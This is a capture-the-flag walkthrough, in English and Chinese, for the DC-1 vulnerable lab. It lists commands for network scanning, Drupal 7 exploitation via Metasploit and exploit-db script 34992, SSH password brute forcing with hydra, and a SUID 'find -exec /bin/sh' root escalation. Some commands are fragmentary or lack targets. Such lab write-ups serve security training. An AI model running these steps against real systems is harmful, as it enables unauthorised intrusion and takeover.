DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.

To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.

There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.

There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.

Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.

Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.






*用nmap -sP 参数 ping命令去扫描与kali同网段的* *存活主机。*

​ nmap -sP -oN nmap.sP



*使用全端口扫描显示详细信息,**TCP连接扫描**并开启脚本* *功能。*

*nmap -A -p- -sC -T4 -sT -oN nmap.A*


*22/tcp* *open* *ssh* *OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)*
*80/tcp* *open* *http* *Apache httpd 2.2.22 ((Debian))*
*111/tcp* *open* *rpcbind* *2-4 (RPC #100000)*
*39284**/tcp* *open* *status* *1 (RPC #100024)*






*CMS: drupal 7 中间件:Apache*

*编程语言: php OS:linux*


*既然知道了cms是drupal 7,那么可以查一下相关漏洞。*


*Searchsploit drupal 7*


*在msf中搜索漏洞裤:search drupal 7*

*使用最新exp:use 1*

*Show option :查看参数*

*设置rhost : set rhost (kali的IP)*






*在/etc/passwd 中看系统用户*










*hydra -l flag4 -P /usr/share/john/password.lst ssh:// -vV*

*-l:指定用户名 -P:指定密码字典*





· *获取root 权限*


· *利用系统内核漏洞提权*

· *sudo 权限泄露*

· *利用SUID 提权*





*find / -perm -4000 2>/dev/null*





















*使用方法* *find (一个路径或文件必须存在) -exec 执行命令 (结束);*

*find ray -exec '/bin/sh' ;*




Cd /usr/share/exploitdb/exploits/php/webapps/34992.py

*查看使用方法* searchsploit -m 34992

*python 34992.py -t http://*** *-u* *123* *-p* *123*





